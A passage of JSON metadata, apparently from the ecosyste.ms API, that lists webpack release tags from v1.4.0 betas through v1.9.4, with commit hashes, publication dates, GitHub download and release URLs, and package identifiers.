f731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-bet